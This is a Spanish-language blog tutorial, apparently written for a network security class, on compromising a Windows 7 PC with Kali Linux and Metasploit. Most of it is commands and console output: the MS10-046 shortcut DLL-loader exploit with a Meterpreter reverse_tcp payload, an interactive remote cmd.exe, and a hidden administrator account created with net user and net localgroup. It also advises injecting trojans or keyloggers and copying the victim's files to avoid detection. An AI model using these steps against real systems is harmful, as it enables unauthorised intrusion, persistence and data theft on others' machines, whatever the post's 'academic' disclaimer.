sábado, 21 de noviembre de 2015

Hackear Windows 7 Pro con Kali Linux y Metasploit Framework

Amigos esta vez les quiero compartir una de las actividades practicas que he realizado con mis alumnos de Taller de Seguridad en Redes y se trata de como hackear un sistema operativo Windows 7 con Kali linux y metasploit en pocos pasos.

Utilizaremos la técnica de DLL Loader
Los requerimientos

  • Kali Lnux 2.x y Rubi instalado
  • PC con WIndows 7 Pro
  • Metasploit Framework



Esta guía aplica a sistemas operativos sin antivirus/Firewall y con control de cuentas de usuario disminuidas o desactivadas

¿Qué es MetaSploit?

En pocas palabras Metasploit  Project es un proyecto de seguridad informática que proporciona información acerca de las vulnerabilidades de seguridad y ayuda en las pruebas de penetración y desarrollo de firmas de IDS.


Preparándonos para el ataque, en mi caso utilizaré 2 máquinas cargadas en virtualbox previamente el pc con windows tiene la IP 192.168.56.101 y el con Kali linux la IP 192.168.56.102



1.- Iniciamos las máquinas y debemos conocer obviamente cada una de las direcciones IP


2.- En Kali Linux ingresamos a una terminal para iniciar metasploit y ejecutamos las siguientes lineas, en nuestro caso utilizaremos el exploit de meterpreter

root@kali:~# msfconsole 
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 
msf exploit(ms10_046_shortcut_icon_dllloader) >


msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(ms10_046_shortcut_icon_dllloader) > show options 

Ahora Aparecerán las opciones para configurar el servidor



3.- Asignaremos la IP del PC con Kali linux al SRVHOSTy LHOST

msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.56.102
SRVHOST => 192.168.56.102
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.56.102
LHOST => 192.168.56.102

4.- Iniciamos el exploit

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit 
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.102:4444 
[*] Send vulnerable clients to \\192.168.56.102\TXSWXRTH\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*] Using URL: http://192.168.56.102:80/
[*] Server started.
msf exploit(ms10_046_shortcut_icon_dllloader) >

Si nos fijamos hay una linea que dice "Using URL: http://192.168.56.102:80/" que es la que debemos utilizar en windows 7 desde el navegador



5- Una vez que accedamos a la dirección se nos abrirá una ventana preguntando si permitimos la conexión, damos clic en permitir.


Por su parte en la consola de metasploit comienza a emitir los logs del ataque

6.- al permitr se ejecutará el "dllloader" por lo que basta hacer un clic sobre el acceso directo

7.- En los log de  msfconsole veremos que se habilita la sesión 1 y para ello hacemos un enter para despejar los logs y escribimos

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  GeekLinux-PC\GeekLinux @ GeekLinux-PC  192.168.56.102:4444 -> 192.168.56.101:49276 (192.168.56.101)

8.- Nos dice que esta la sesión 1 establecida por lo que el comando para seleccionar la sesión es similar al anterior solo que agregamos el número de la sesión al final.

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1

9.- Aparecerá la consola de Meterpreter

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >


Existe mucha documentación acerca de los comandos de meterpreter, acá podríamos inyectar un trayano o un keylogger, crear o copiar archivos, agregar usuarios, etc.


Ejemplo de captura de pantalla del PC atacado

meterpreter > screenshot


En la carpeta Root nos aparece la captura de pantalla


Ejemplo acceder a cmd.exe remotamente

meterpreter > execute -f cmd.exe -i –H
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Windows\system32>

Ejemplo agregar un usuario

C:\Windows\system32> net user GeekLinux 123456 /add

Hemos creado a un usuario llamado GeekLinux y su clave de acceso es 123456

Ejemplo Agregar al usuario al grupo administradores

C:\Windows\system32> net localgroup Administradores GeekLinux /add



Existe una infinidad de cosas que hacer, por supuesto crear un usuario evidenciaría mucho que el equipo ha sido hackeado pero complementar con otros ataques de metasploit como inyectar un troyano o algún keylogger seria mejor, o simplemente realizar copias de los archivos que desea, etc.

Esta guía esta realizada solo con fines académicos, para utilizarla no olviden hacer referencia a mi blog, Saludos



No hay comentarios: